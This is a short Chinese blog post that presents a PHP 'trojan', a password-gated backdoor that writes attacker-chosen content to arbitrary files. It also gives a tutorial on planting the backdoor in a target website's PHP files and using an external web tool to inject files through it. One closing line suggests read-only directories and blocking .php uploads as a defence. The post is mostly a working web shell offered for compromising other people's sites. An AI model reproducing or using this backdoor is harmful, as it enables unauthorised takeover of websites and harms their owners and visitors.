朱纯树博客
VPS测评推荐网站
cloudacead cloudacead

简单的 PHP木马代码及使用教程

代码

<?PHP
if ($_REQUEST['nihaook']=="niubi")
{
$f=@fopen($_REQUEST["f"],"w");
if(@fwrite($f,$_REQUEST["c"]))
echo "s";
}
?>

使用教程

把上面代码弄到你要搞的网站任意PHP文件内
打开 https://tool.sirblog.cn/iu/webs
截图20200303115814.jpg
输入对应信息即可注入,注入文件名不能为/开头 不然会出错
目标网址必须加上协议头 (http或者https)

如何防止

把网站所有目录权限设置为只读,设置禁止上传.php文件

赞(0) 打赏
未经允许不得转载:VPS测评推荐网站 - 朱纯树博客 » 简单的 PHP木马代码及使用教程

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址